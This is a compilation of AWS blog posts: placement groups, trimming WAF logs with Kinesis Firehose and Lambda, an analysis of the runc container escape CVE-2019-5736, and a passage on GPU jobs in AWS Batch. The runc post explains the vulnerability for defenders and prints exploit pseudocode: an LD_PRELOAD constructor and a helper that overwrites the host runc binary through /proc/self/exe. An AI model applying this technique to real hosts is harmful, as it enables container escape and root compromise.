After you launch the EC2 instances, you can view the partition number associated with each instance. For these rack-aware applications, you can now treat the partition number associated with instances as rack-ids and pass this information to the application. The application can then use this topology information to decide the replication model to improve the application performance and data reliability. View this information in the console by filtering by placement group name or by the partition number.

Run the following command:

aws ec2 describe-instances --filters "Name=placement-group-name,Values = HDFS-GROUP-A,Name=placement-partition-number,Values = 1" 

Conclusion

Partition placement groups provide you with a way to reduce the likelihood of correlated failures for large workloads. This allows you to run applications like Hadoop, HBase, Cassandra, Kafka, and Aerospike within a single Availability Zone. By deploying these applications within a single zone, you can benefit from the lower latency offered within a zone, improving the application performance. Partition placement groups also offer elasticity, allowing you to run any number of instances within the placement group. For more information, see Partition Placement Groups.

Trimming AWS WAF logs with Amazon Kinesis Firehose transformations

Post Syndicated from Tino Tran original https://aws.amazon.com/blogs/security/trimming-aws-waf-logs-with-amazon-kinesis-firehose-transformations/

In an earlier post, Enabling serverless security analytics using AWS WAF full logs, Amazon Athena, and Amazon QuickSight, published on March 28, 2019, the authors showed you how to stream WAF logs with Amazon Kinesis Firehose for visualization using QuickSight. This approach used no filtering of the logs so that you could visualize the full data set. However, you are often only interested in seeing specific events. Or you might be looking to minimize log size to save storage costs. In this post, I show you how to apply rules in Amazon Kinesis Firehose to trim down logs. You can then apply the same visualizations you used in the previous solution.

AWS WAF is a web application firewall that supports full logging of all the web requests it inspects. For each request, AWS WAF logs the raw HTTP/S headers along with information on which AWS WAF rules were triggered. Having complete logs is useful for compliance, auditing, forensics, and troubleshooting custom and Managed Rules for AWS WAF. However, for some use cases, you might not want to log all of the requests inspected by AWS WAF. For example, to reduce the volume of logs, you might only want to log the requests blocked by AWS WAF, or you might want to remove certain HTTP header or query string parameter values from your logs. In many cases, unblocked requests are often already stored in your CloudFront access logs or web server logs and, therefore, using AWS WAF logs can result in redundant data for these requests, while logging blocked traffic can help you to identify bad actors or root cause false positives.

In this post, I’ll show you how to create an Amazon Kinesis Data Firehose stream to filter out unneeded records, so that you only retain log records for requests that were blocked by AWS WAF. From here, the logs can be stored in Amazon S3 or directed to SIEM (Security information and event management) and log analysis tools.

To simplify things, I’ll provide you with a CloudFormation template that will create the resources highlighted in the diagram below:
 

Figure 1: Solution architecture

Figure 1: Solution architecture

  1. A Kinesis Data Firehose delivery stream is used to receive log records from AWS WAF.
  2. An IAM role for the Kinesis Data Firehose delivery stream, with permissions needed to invoke Lambda and write to S3.
  3. A Lambda function used to filter out WAF records matching the default action before the records are written to S3.
  4. An IAM role for the Lambda function, with the permissions needed to create CloudWatch logs (for troubleshooting).
  5. An S3 bucket where the WAF logs will be stored.

Prerequisites and assumptions

  • In this post, I assume that the AWS WAF default action is configured to allow requests that don’t explicitly match a blocking WAF rule. So I’ll show you how to omit any records matching the WAF default action.
  • You need to already have a AWS WAF WebACL created. In this example, you’ll use a WebACL generated from the AWS WAF OWASP 10 template. For more information on deploying AWS WAF to a CloudFront or ALB resource, see the Getting Started page.

Step 1: Create a Kinesis Data Firehose delivery stream for AWS WAF logs

In this step, you’ll use the following CloudFormation template to create a Kinesis Data Firehose delivery stream that writes logs to an S3 bucket. The template also creates a Lambda function that omits AWS WAF records matching the default action.

Here’s how to launch the template:

  1. Open CloudFormation in the AWS console.
  2. For WAF deployments on Amazon CloudFront, select region US-EAST-1. Otherwise, create the stack in the same region in which your AWS WAF Web ACL is deployed.
  3. Select the Create Stack button.
  4. In the CloudFormation wizard, select Specify an Amazon S3 template URL and copy and paste the following URL into the text box, then select Next:
    https://s3.amazonaws.com/awsiammedia/public/sample/TrimAWSWAFLogs/KinesisWAFDeliveryStream.yml
  5. On the options page, leave the default values and select Next.
  6. Specify the following and then select Next:
    1. Stack name: (for example, kinesis-waf-logging). Make sure to note your stack name, as you’ll need to provide it later in the walkthrough.
    2. Buffer size: This value specifies the size in MB for which Kinesis will buffer incoming records before processing.
    3. Buffer interval: This value specifies the interval in seconds for which Kinesis will buffer incoming records before processing.

    Note: Kinesis will trigger data delivery based on which buffer condition is satisfied first. This CloudFormation sets the default buffer size to 3MB and interval size to 900 seconds to match the maximum transformation buffer size and intervals which is set by this template. To learn more about Kinesis Data Firehose buffer conditions, read this documentation.

     

    Figure 2: Specify the stack name, buffer size, and buffer interval

    Figure 2: Specify the stack name, buffer size, and buffer interval

  7. Select the check box for I acknowledge that AWS CloudFormation might create IAM resources and choose Create.
  8. Wait for the template to finish creating the resources. This will take a few minutes. On the CloudFormation dashboard, the status next to your stack should say CREATE_COMPLETE.
  9. From the AWS Management Console, open Amazon Kinesis and find the Data Firehose delivery stream on the dashboard. Note that the name of the stream will start with aws-waf-logs- and end with the name of the CloudFormation. This prefix is required in order to configure AWS WAF to write logs to the Kinesis stream.
  10. From the AWS Management Console, open AWS Lambda and view the Lambda function created from the CloudFormation template. The function name should start with the Stack name from the CloudFormation template. I included the function code generated from the CloudFormation template below so you can see what’s going on.

    Note: Through CloudFormation, the code is deployed without indentation. To format it for readability, I recommend using the code formatter built into Lambda under the edit tab. This code can easily be modified for custom record filtering or transformations.

    
        'use strict';
    
        exports.handler = (event, context, callback) => {
            /* Process the list of records and drop those containing Default_Action */
            const output = event.records.map((record) => {
                const entry = (new Buffer(record.data, 'base64')).toString('utf8');
                if (!entry.match(/Default_Action/g)){
                    return {
                        recordId: record.recordId,
                        result: 'Ok',
                        data: record.data,
                    };
                } else {
                    return {
                        recordId: record.recordId,
                        result: 'Dropped',
                        data: record.data,
                    };
                }
            });
        
            console.log(`Processing completed.  Successful records ${output.length}.`);
            callback(null, { records: output });
        };"        
        

You now have a Kinesis Data Firehose stream that AWS WAF can use for logging records.

Cost Considerations

This template sets the Kinesis transformation buffer size to 3MB and buffer interval to 900 seconds (the maximum values) in order to reduce the number of Lambda invocations used to process records. On average, an AWS WAF record is approximately 1-1.5KB. With a buffer size of 3MB, Kinesis will use 1 Lambda invocation per 2000-3000 records. Visit the AWS Lambda website to learn more about pricing.

Step 2: Configure AWS WAF Logging

Now that you have an active Amazon Kinesis Firehose delivery stream, you can configure your AWS WAF WebACL to turn on logging.

  1. From the AWS Management Console, open WAF & Shield.
  2. Select the WebACL for which you would like to enable logging.
  3. Select the Logging tab.
  4. Select the Enable Logging button.
  5. Next to Amazon Kinesis Data Firehose, select the stream that was created from the CloudFormation template in Step 1 (for example, aws-waf-logs-kinesis-waf-stream) and select Create.

Congratulations! Your AWS WAF WebACL is now configured to send records of requests inspected by AWS WAF to Kinesis Data Firehose. From there, records that match the default action will be dropped, and the remaining records will be stored in S3 in JSON format.

Below is a sample of the logs generated from this example. Notice that there are only blocked records in the logs.
 

Figure 3: Sample logs

Figure 3: Sample logs

Conclusion

In this blog, I’ve provided you with a CloudFormation template to generate a Kinesis Data Firehose stream that can be used to log requests blocked by AWS WAF, omitting requests matching the default action. By omitting the default action, I have reduced the number of log records that must be reviewed to identify bad actors, tune new WAF rules, and/or root cause false positives. For unblocked traffic, consider using CloudFront’s access logs with Amazon Athena or CloudWatch Logs Insights to query and analyze the data. To learn more about AWS WAF logs, read our developer guide for AWS WAF.

If you have feedback about this blog post, , please submit them in the Comments section below. If you have issues with AWS WAF, start a thread on the AWS SSO forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Tino Tran

Tino is a Senior Edge Specialized Solutions Architect based out of Florida. His main focus is to help companies deliver online content in a secure, reliable, and fast way using AWS Edge Services. He is a experienced technologist with a background in software engineering, content delivery networks, and security.

Anatomy of CVE-2019-5736: A runc container escape!

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/anatomy-of-cve-2019-5736-a-runc-container-escape/

This post is courtesy of Samuel Karp, Senior Software Development Engineer — Amazon Container Services.

On Monday, February 11, CVE-2019-5736 was disclosed.  This vulnerability is a flaw in runc, which can be exploited to escape Linux containers launched with Docker, containerd, CRI-O, or any other user of runc.  But how does it work?  Dive in!

This concern has already been addressed for AWS, and no customer action is required. For more information, see the security bulletin.

A review of Linux process management

Before I explain the vulnerability, here’s a review of some Linux basics.

  • Processes and syscalls
  • What is /proc?
  • Dynamic linking

Processes and syscalls

Processes form the core unit of running programs on Linux. Every launched program is represented by one or more processes.  Processes contain a variety of data about the running program, including a process ID (pid), a table tracking in-use memory, a pointer to the currently executing instruction, a set of descriptors for open files, and so forth.

Processes interact with the operating system to perform a variety of operations (for example, reading and writing files, taking input, communicating on the network, etc.) via system calls, or syscalls.  Syscalls can perform a variety of actions. The ones I’m interested in today involve creating other processes (typically through fork(2) or clone(2)) and changing the currently running program into something else (execve(2)).

File descriptors are how a process interacts with files, as managed by the Linux kernel.  File descriptors are short identifiers (numbers) that are passed to the appropriate syscalls for interacting with files: read(2), write(2), close(2), and so forth.

Sometimes a process wants to spawn another process.  That might be a shell running a program you typed at the terminal, a daemon that needs a helper, or even concurrent processing without threads.  When this happens, the process typically uses the fork(2) or clone(2) syscalls.

These syscalls have some differences, but they both operate by creating another copy of the currently executing process and sharing some state.  That state can include things like the memory structures (either shared memory segments or copies of the memory) and file descriptors.

After the new process is started, it’s the responsibility of both processes to figure out which one they are (am I the parent? Am I the child?). Then, they take the appropriate action.  In many cases, the appropriate action is for the child to do some setup, and then execute the execve(2) syscall.

The following example shows the use of fork(2), in pseudocode:

func main() {
    child_pid= fork();
    if (child_pid > 0) {
        // This is the parent process, since child_pid is the pid of the child
        // process.
    } else if (child_pid == 0) {
        // This is the child process. It can retrieve its own pid via getpid(2),
        // if desired.  This child process still sees all the variables in memory
        // and all the open file descriptors.
    }
}

The execve(2) syscall instructs the Linux kernel to replace the currently executing program with another program, in-place.  When called, the Linux kernel loads the new executable as specified and pass the specified arguments.  Because this is done in place, the pid is preserved and a variety of other contextual information is carried over, including environment variables, the current working directory, and any open files.

func main() {
    // execl(3) is a wrapper around the execve(2) syscall that accepts the
    // arguments for the executed program as a list.
    // The first argument to execl(3) is the path of the executable to
    // execute, which in this case is the pwd(1) utility for printing out
    // the working directory.
    // The next argument to execl(3) is the first argument passed through
    // to the new program (in a C program, this would be the first element
    // of the argc array, or argc[0]).  By convention, this is the same as
    // the path of the executable.
    // The remaining arguments to execl(3) are the other arguments visible
    // in the new program's argc array, terminated by NULL.  As you're
    // not passing any additional arguments, just pass NULL here.
    execl("/bin/pwd", "/bin/pwd", NULL);
    // Nothing after this point executes, since the running process has been
    // replaced by the new pwd(1) program.
}

Wait…open files?  By default, open files are passed across the execve(2) boundary.  This is useful in cases where the new program can’t open the file, for example if there’s a new mount covering the existing path.  This is also the mechanism by which the standard I/O streams (stdin, stdout, and stderr) are made available to the new program.

While convenient in some use cases, it’s not always desired to preserve open file descriptors in the new program. This behavior can be changed by passing the O_CLOEXEC flag to open(2) when opening the file or by setting the FD_CLOEXEC flag with fcntl(2).  Using O_CLOEXEC or FD_CLOEXEC (which are both short for close-on-exec) prevents the new program from having access to the file descriptor.

func main() {
    // open(2) opens a file.  The first argument to open is the path of the file
    // and the second argument is a bitmask of flags that describe options
    // applied to the file that's opened.  open(2) then returns a file
    // descriptor, which can be used in subsequent syscalls to represent this
    // file.
    // For this example, open /dev/urandom, which is a file containing random
    // bytes.  Pass two flags: O_RDONLY and O_CLOEXEC; O_RDONLY indicates that
    // the file should be open for reading but not writing, and O_CLOEXEC
    // indicates that the file descriptor should not pass through the execve(2)
    // boundary.
    fd = open("/dev/urandom", O_RDONLY | O_CLOEXEC);
    // All valid file descriptors are positive integers, so a returned value < 0
    // indicates that an error occurred.
    if (fd < 0) {
        // perror(3) is a function to print out the last error that occurred.
        error("could not open /dev/urandom");
        // exit(3) causes a process to exit with a given exit code. Return 1
        // here to indicate that an error occurred.
        exit(1);
    }
}

What is /proc?
/proc (or proc(5)) is a pseudo-filesystem that provides access to a number of Linux kernel data structures.  Every process in Linux has a directory available for it called /proc/[pid].  This directory stores a bunch of information about the process, including the arguments it was given when the program started, the environment variables visible to it, and the open file descriptors.

The special files inside /proc/[pid]/fd describe the file descriptors that the process has open.  They look like symbolic links (symlinks), and you can see the original path of the file, but they aren’t exactly symlinks. You can pass them to open(2) even if the original path is inaccessible and get another working file descriptor.

Another file inside /proc/[pid] is called exe. This file is like the ones in /proc/[pid]/fd except that it points to the binary program that is executing inside that process.

/proc/[pid] also has a companion directory, /proc/self.  This directory is always the same as /proc/[pid] of the process that is accessing it. That is, you can always read your own /proc data from /proc/self without knowing your pid.

Dynamic linking

When writing programs, software developers typically use libraries—collections of previously written code intended to be reused.  Libraries can cover all sorts of things, from high-level concerns like machine learning to lower-level concerns like basic data structures or interfaces with the operating system.

In the code example above, you can see the use of a library through a call to a function defined in a library (fork).

Libraries are made available to programs through linking: a mechanism for resolving symbols (types, functions, variables, etc.) to their definition.  On Linux, programs can be statically linked, in which case all the linking is done at compile time and all symbols are fully resolved. Or they can be dynamically linked, in which case at least some symbols are unresolved until a runtime linker makes them available.

Dynamic linking makes it possible to replace some parts of the resulting code without recompiling the whole application. This is typically used for upgrading libraries to fix bugs, enhance performance, or to address security concerns.  In contrast, static linking requires re-compiling and re-linking each program that uses a given library to affect the same change.

On Linux, runtime linking is typically performed by ld-linux.so(8), which is provided by the GNU project toolchain.  Dynamically linked libraries are specified by a name embedded into the compiled binary.  This dynamic linker reads those names and then performs a search across a standard set of paths to find the associated library file (a shared object file, or .so).

The dynamic linker’s search path can be influenced by the LD_LIBRARY_PATH environment variable.  The LD_PRELOAD environment variable can tell the linker to load additional, user-specified libraries before all others. This is useful in debugging scenarios to allow selective overriding of symbols without having to rebuild a library entirely.

The vulnerability

Now that the cast of characters is set (fork(2), execve(2), open(2), proc(5), file descriptors, and linking), I can start talking about the vulnerability in runc.

runc is a container runtime.  Like a shell, its primary purpose is to launch other programs. However, it does so after manipulating Linux resources like cgroups, namespaces, mounts, seccomp, and capabilities to make what is referred to as a “container.”

The primary mechanism for setting up some of these resources, like namespaces, is through flags to the clone(2) syscall that take effect in the new process.  The target of the final execve(2) call is the program the user requested. It With a container, the target of the final execve(2) call can be specified in the container image or through explicit arguments.

The CVE announcement states:

The vulnerability allows a malicious container to […] overwrite the host runc binary […].  The level of user interaction is being able to run any command […] as root within a container [when creating] a new container using an attacker-controlled image.

The operative parts of this are: being able to overwrite the host runc binary (that seems bad) by running a command (that’s…what runc is supposed to do…).  Note too that the vulnerability is as simple as running a command and does not require running a container with elevated privileges or running in a non-default configuration.

Don’t containers protect against this?

Containers are, in many ways, intended to isolate the host from a given workload or to isolate a given workload from the host.  One of the main mechanisms for doing this is through a separate view of the filesystem.  With a separate view, the container shouldn’t be able to access the host’s files and should only be able to see its own.  runc accomplishes this using a mount namespace and mounting the container image’s root filesystem as /.  This effectively hides the host’s filesystem.

Even with techniques like this, things can pass through the mount namespace.  For example, the /proc/cmdline file contains the running Linux kernel’s command-line parameters.  One of those parameters typically indicates the host’s root filesystem, and a container with enough access (like CAP_SYS_ADMIN) can remount the host’s root filesystem within the container’s mount namespace.

That’s not what I’m talking about today, as that requires non-default privileges to run.  The interesting thing today is that the /proc filesystem exposes a path to the original program’s file, even if that file is not located in the current mount namespace.

What makes this troublesome is that interacting with Linux primitives like namespaces typically requires you to run as root, somewhere.  In most installations involving runc (including the default configuration in Docker, Kubernetes, containerd, and CRI-O), the whole setup runs as root.

runc must be able to perform a number of operations that require elevated privileges, even if your container is limited to a much smaller set of privileges. For example, namespace creation and mounting both require the elevated capability CAP_SYS_ADMIN, and configuring the network requires the elevated capability CAP_NET_ADMIN. You might see a pattern here.

An alternative to running as root is to leverage a user namespace. User namespaces map a set of UIDs and GIDs inside the namespace (including ones that appear to be root) to a different set of UIDs and GIDs outside the namespace.  Kernel operations that are user-namespace-aware can delineate privileged actions occurring inside the user namespace from those that occur outside.

However, user namespaces are not yet widely employed and are not enabled by default. The set of kernel operations that are user-namespace-aware is still growing, and not everyone runs the newest kernel or user-space software.

So, /proc exposes a path to the original program’s file, and the process that starts the container runs as root.  What if that original program is something important that you knew would run again… like runc?

Exploiting it!

runc’s job is to run commands that you specify.  What if you specified /proc/self/exe?  It would cause runc to spawn a copy of itself, but running inside the context of the container, with the container’s namespaces, root filesystem, and so on.  For example, you could run the following command:

docker run –rm amazonlinux:2 /proc/self/exe

This, by itself, doesn’t get you far—runc doesn’t hurt itself.

Generally, runc is dynamically linked against some libraries that provide implementations for seccomp(2), SELinux, or AppArmor.  If you remember from earlier, ld-linux.so(8) searches a standard set of file paths to provide these implementations at runtime.  If you start runc again inside the container’s context, with its separate filesystem, you have the opportunity to provide other files in place of the expected library files. These can run your own code instead of the standard library code.

There’s an easier way, though.  Instead of having to make something that looks like (for example) libseccomp, you can take advantage of a different feature of the dynamic linker: LD_PRELOAD.  And because runc lets you specify environment variables along with the path of the executable to run, you can specify this environment variable, too.

With LD_PRELOAD, you can specify your own libraries to load first, ahead of the other libraries that get loaded.  Because the original libraries still get loaded, you don’t actually have to have a full implementation of their interface.  Instead, you can selectively override some common functions that you might want and omit others that you don’t.

So now you can inject code through LD_PRELOAD and you have a target to inject it into: runc, by way of /proc/self/exe.  For your code to get run, something must call it.  You could search for a target function to override, but that means inspecting runc’s code to figure out what could get called and how.  Again, there’s an easier way.  Dynamic libraries can specify a “constructor” that is run immediately when the library is loaded.

Using the “constructor” along with LD_PRELOAD and specifying the command as /proc/self/exe, you now have a way to inject code and get it to run.  That’s it, right?  You can now write to /proc/self/exe and overwrite runc!

Not so fast.

The Linux kernel does have a bit of a protection mechanism to prevent you from overwriting the currently running executable.  If you open /proc/self/exe for writing, you get -ETXTBSY.  This error code indicates that the file is busy, where “TXT” refers to the text (code) section of the binary.

You know from earlier that execve(2) is a mechanism to replace the currently running executable with another, which means that the original executable isn’t in use anymore.  So instead of just having a single library that you load with LD_PRELOAD, you also must have another executable that can do the dirty work for you, which you can execve(2).

Normally, doing this would still be unsuccessful due to file permissions. Executables are typically not world-writable.  But because runc runs as root and does not change users, the new runc process that you started through /proc/self/exe and the helper program that you executed are also run as root.

After you gain write access to the runc file descriptor and you’ve replaced the currently executing program with execve(2), you can replace runc’s content with your own.  The other software on the system continues to start runc as part of its normal operation (for example, creating new containers, stopping containers, or performing exec operations inside containers). Your code has the chance to operate instead of runc.  When it gets run this way, your code runs as root, in the host’s context instead of in the container’s context.

Now you’re done!  You’ve successfully escaped the container and have full root access.

Putting that all together, you get something like the following pseudocode:

Preload pseudocode for preload.so

func constructor(){
    // /proc/self/exe is a virtual file pointing to the currently running
    // executable.  Open it here so that it can be passed to the next
    // process invoked.  It must be opened read-only, or the kernel will fail
    // the open syscall with ETXTBSY.  You cannot gain write access to the text
    // portion of a running executable.
    fd = open("/proc/self/exe", O_RDONLY);
    if (fd < 0) {
        error("could not open /proc/self/exe");
        exit(1);
    }
    // /proc/self/fd/%d is a virtual file representing the open file descriptor
    // to /proc/self/exe, which you opened earlier.
    filename = sprintf("/proc/self/fd/%d", fd);
    // execl is a call that executes a new executable, replacing the
    // currently running process and preserving aspects like the process ID.
    // Execute the "rewrite" binary, passing it arguments representing the
    // path of the open file descriptor. Because you did not pass O_CLOEXEC when
    // opening the file, the file descriptor remains open in the replacement
    // program and retains the same descriptor.
    execl("/rewrite", "/rewrite", filename, NULL);
    // execl never returns, except on an error
    error("couldn't execl");
}

Pseudocode for the rewrite program

// rewrite is your cooperating malicious program that takes an argument
// representing a file descriptor path, reopens it as read-write, and
// replaces the contents.  rewrite expects that it is unable to open
// the file on the first try, as the kernel has not closed it yet
func main(argc, *argv[]) {
    fd = 0;
    printf("Running\n");
    for(tries = 0; tries < 10000; tries++) {
        // argv[1] is the argument that contains the path to the virtual file
        // of the read-only file descriptor
        fd = open(argv[1], O_RDWR|O_TRUNC);
        if( fd >= 0 ) {
            printf("open succeeded\n");
            break;
        } else {
            if(errno != ETXTBSY) {
                // You expect a lot of ETXTBSY, so only print when you get something else
                error("open");
            }
        }
    }
    if (fd < 0) {
        error("exhausted all open attempts");
        exit(1);
    }
    dprintf(fd, "CVE-2019-5736\n");
    printf("wrote over runc!\n");
    fflush(stdout);

The above code was written by Noah Meyerhans, iliana weller, and Samuel Karp.

How does the patch work?

If you try the same approach with a patched runc, you instead see that opening the file with O_RDWR is denied.  This means that the patch is working!

The runc patch operates by taking advantage of some Linux kernel features introduced in kernel 3.17, specifically a syscall called memfd_create(2).  This syscall creates a temporary memory-backed file and a file descriptor that can be used to access the file.  This file descriptor has some special semantics:  It is automatically removed when the last reference to it is dropped. It’s in memory, so that just equates to freeing the memory.  It supports another useful feature: file sealing.  File sealing allows the file to be made immutable, even to processes that are running as root.

The runc patch changes the behavior of runc so that it creates a copy of itself in one of these temporary file descriptors, and then seals it.  The next time a process launches (via fork(2)) or a process is replaced (via execve(2)), /proc/self/exe will be this sealed, memory-backed file descriptor.  When your rewrite program attempts to modify it, the Linux kernel prevents it as it’s a sealed file.

Could I have avoided being vulnerable?

Yes, a few different mechanisms were available before the patch that provided mitigation for this vulnerability.  The one that I mentioned earlier is user namespaces. Mapping to a different user namespace inside the container would mean that normal Linux file permissions would effectively prevent runc from becoming writable because the compromised process inside the container is not running as the real root user.

Another mechanism, which is used by Google Container-Optimized OS, is to have the host’s root filesystem mounted as read-only.  A read-only mount of the runc binary itself would also prevent the runc binary from becoming writable.

SELinux, when correctly configured, may also prevent this vulnerability.

A different approach to preventing this vulnerability is to treat the Linux kernel as belonging to a single tenant, and spend your effort securing the kernel through another layer of separation.  This is typically accomplished using a hypervisor or a virtual machine.

Amazon invests heavily in this type of boundary. Amazon EC2 instances, AWS Lambda functions, and AWS Fargate tasks are secured from each other using techniques like these.  Amazon EC2 bare-metal instances leverage the next-generation Nitro platform that allows AWS to offer secure, bare-metal compute with a hardware root-of-trust.  Along with traditional hypervisors, the Firecracker virtual machine manager can be used to implement this technique with function- and container-like workloads.

Further reading

The original researchers who discovered this vulnerability have published their own post, CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host. They describe how they discovered the vulnerability, as well as several other attempts.

Acknowledgements

I’d like to thank the original researchers who discovered the vulnerability for reporting responsibly and the OCI maintainers (and Aleksa Sarai specifically) who coordinated the disclosure. Thanks to Linux distribution maintainers and cloud providers who made updated packages available quickly.  I’d also like to thank the Amazonians who made it possible for AWS customers to be protected:

  • AWS Security who ran the whole process
  • Clare Liguori, Onur Filiz, Noah Meyerhans, iliana weller, and Tom Kirchner who performed analysis and validation of the patch
  • The Amazon Linux team (and iliana weller specifically) who backported the patch and built new Docker RPMs
  • The Amazon ECS, Amazon EKS, and AWS Fargate teams for making patched infrastructure available quickly
  • And all of the other AWS teams who put in extra effort to protect AWS customers

GPU workloads on AWS Batch

Post Syndicated from Josh Rad original https://aws.amazon.com/blogs/compute/gpu-workloads-on-aws-batch/

Contributed by Manuel Manzano Hoss, Cloud Support Engineer

I remember playing around with graphics processing units (GPUs) workload examples in 2017 when the Deep Learning on AWS Batch post was published by my colleague Kiuk Chung. He provided an example of how to train a convolutional neural network (CNN), the LeNet architecture, to recognize handwritten digits from the MNIST dataset using Apache MXNet as the framework. Back then, to run such jobs with GPU capabilities, I had to do the following:

  • Create a custom GPU-enabled AMI that had installed Docker, the ECS agent, NVIDIA driver and container runtime, and CUDA.
  • Identify the type of P2 EC2 instance that had the required amount of GPU for my job.
  • Check the amount of vCPUs that it offered (even if I was not interested on using them).
  • Specify that number of vCPUs for my job.

All that, when I didn’t have any certainty that the instance was going to have the GPU required available when my job was already running. Back then, there was no GPU pinning. Other jobs running on the same EC2 instance were able to use that GPU, making the orchestration of my jobs a tricky task.

Fast forward two years. Today, AWS Batch announced integrated support for Amazon EC2 Accelerated Instances. It is now possible to specify an amount of GPU as a resource that AWS Batch considers in choosing the EC2 instance to run your job, along with vCPU and memory. That allows me to take advantage of the main benefits of using AWS Batch, the compute resource selection algorithm and job scheduler. It also frees me from having to check the types of EC2 instances that have enough GPU.

Also, I can take advantage of the Amazon ECS GPU-optimized AMI maintained by AWS. It comes with the NVIDIA drivers and all the necessary software to run GPU-enabled jobs. When I allow the P2 or P3 instance types on my compute environment, AWS Batch launches my compute resources using the Amazon ECS GPU-optimized AMI automatically.

In other words, now I don’t worry about the GPU task list mentioned earlier. I can focus on deciding which framework and command to run on my GPU-accelerated workload. At the same time, I’m now sure that my jobs have access to the required performance, as physical GPUs are pinned to each job and not shared among them.

A GPU race against the past

As a kind of GPU-race exercise, I checked a similar example to the one from Kiuk’s post, to see how fast it could be to run a GPU-enabled job now. I used the AWS Management Console to demonstrate how simple the steps are.

In this case, I decided to use the deep neural network architecture called multilayer perceptron (MLP), not the LeNet CNN, to compare the validation accuracy between them.

To make the test even simpler and faster to implement, I thought I would use one of the recently announced AWS Deep Learning containers, which come pre-packed with different frameworks and ready-to-process data. I chose the container that comes with MXNet and Python 2.7, customized for Training and GPU. For more information about the Docker images available, see the AWS Deep Learning Containers documentation.

In the AWS Batch console, I created a managed compute environment with the default settings, allowing AWS Batch to create the required IAM roles on my behalf.

On the configuration of the compute resources, I selected the P2 and P3 families of instances, as those are the type of instance with GPU capabilities. You can select On-Demand Instances, but in this case I decided to use Spot Instances to take advantage of the discounts that this pricing model offers. I left the defaults for all other settings, selecting the AmazonEC2SpotFleetRole role that I created the first time that I used Spot Instances:

Finally, I also left the network settings as default. My compute environment selected the default VPC, three subnets, and a security group. They are enough to run my jobs and at the same time keep my environment safe by limiting connections from outside the VPC:

I created a job queue, GPU_JobQueue, attaching it to the compute environment that I just created:

Next, I registered the same job definition that I would have created following Kiuk’s post. I specified enough memory to run this test, one vCPU, and the AWS Deep Learning Docker image that I chose, in this case mxnet-training:1.4.0-gpu-py27-cu90-ubuntu16.04. The amount of GPU required was in this case, one. To have access to run the script, the container must run as privileged, or using the root user.

Finally, I submitted the job. I first cloned the MXNet repository for the train_mnist.py Python script. Then I ran the script itself, with the parameter –gpus 0 to indicate that the assigned GPU should be used. The job inherits all the other parameters from the job definition:

sh -c 'git clone -b 1.3.1 https://github.com/apache/incubator-mxnet.git && python /incubator-mxnet/example/image-classification/train_mnist.py --gpus 0'

That’s all, and my GPU-enabled job was running. It took me less than two minutes to go from zero to having the job submitted. This is the log of my job, from which I removed the iterations from epoch 1 to 18 to make it shorter:

14:32:31     Cloning into 'incubator-mxnet'...

14:33:50     Note: checking out '19c501680183237d52a862e6ae1dc4ddc296305b'.

14:33:51     INFO:root:start with arguments Namespace(add_stn=False, batch_size=64, disp_batches=100, dtype='float32', gc_threshold=0.5, gc_type='none', gpus='0', initializer='default', kv_store='device', load_epoch=None, loss='', lr=0.05, lr_factor=0.1, lr_step_epochs='10', macrobatch_size=0, model_prefix=None, mom=0.9, monitor=0, network='mlp', num_classes=10, num_epochs=20, num_examples=60000, num_layers=No

14:33:51     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:33:54     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/train-labels-idx1-ubyte.gz HTTP/1.1" 200 28881

14:33:55     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:33:55     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/train-images-idx3-ubyte.gz HTTP/1.1" 200 9912422

14:33:59     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:33:59     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/t10k-labels-idx1-ubyte.gz HTTP/1.1" 200 4542

14:33:59     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:34:00     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/t10k-images-idx3-ubyte.gz HTTP/1.1" 200 1648877

14:34:04     INFO:root:Epoch[0] Batch [0-100] Speed: 37038.30 samples/sec accuracy=0.793472

14:34:04     INFO:root:Epoch[0] Batch [100-200] Speed: 36457.89 samples/sec accuracy=0.906719

14:34:04     INFO:root:Epoch[0] Batch [200-300] Speed: 36981.20 samples/sec accuracy=0.927500

14:34:04     INFO:root:Epoch[0] Batch [300-400] Speed: 36925.04 samples/sec accuracy=0.935156

14:34:04     INFO:root:Epoch[0] Batch [400-500] Speed: 37262.36 samples/sec accuracy=0.940156

14:34:05     INFO:root:Epoch[0] Batch [500-600] Speed: 37729.64 samples/sec accuracy=0.942813

14:34:05     INFO:root:Epoch[0] Batch [600-700] Speed: 37493.55 samples/sec accuracy=0.949063

14:34:05     INFO:root:Epoch[0] Batch [700-800] Speed: 37320.80 samples/sec accuracy=0.953906

14:34:05     INFO:root:Epoch[0] Batch [800-900] Speed: 37705.85 samples/sec accuracy=0.958281

14:34:05     INFO:root:Epoch[0] Train-accuracy=0.924024

14:34:05     INFO:root:Epoch[0] Time cost=1.633

...  LOGS REMOVED

14:34:44     INFO:root:Epoch[19] Batch [0-100] Speed: 36864.44 samples/sec accuracy=0.999691

14:34:44     INFO:root:Epoch[19] Batch [100-200] Speed: 37088.35 samples/sec accuracy=1.000000

14:34:44     INFO:root:Epoch[19] Batch [200-300] Speed: 36706.91 samples/sec accuracy=0.999687

14:34:44     INFO:root:Epoch[19] Batch [300-400] Speed: 37941.19 samples/sec accuracy=0.999687

14:34:44     INFO:root:Epoch[19] Batch [400-500] Speed: 37180.97 samples/sec accuracy=0.999844

14:34:44     INFO:root:Epoch[19] Batch [500-600] Speed: 37122.30 samples/sec accuracy=0.999844

14:34:45     INFO:root:Epoch[19] Batch [600-700] Speed: 37199.37 samples/sec accuracy=0.999687

14:34:45     INFO:root:Epoch[19] Batch [700-800] Speed: 37284.93 samples/sec accuracy=0.999219

14:34:45     INFO:root:Epoch[19] Batch [800-900] Speed: 36996.80 samples/sec accuracy=0.999844

14:34:45     INFO:root:Epoch[19] Train-accuracy=0.999733

14:34:45     INFO:root:Epoch[19] Time cost=1.617

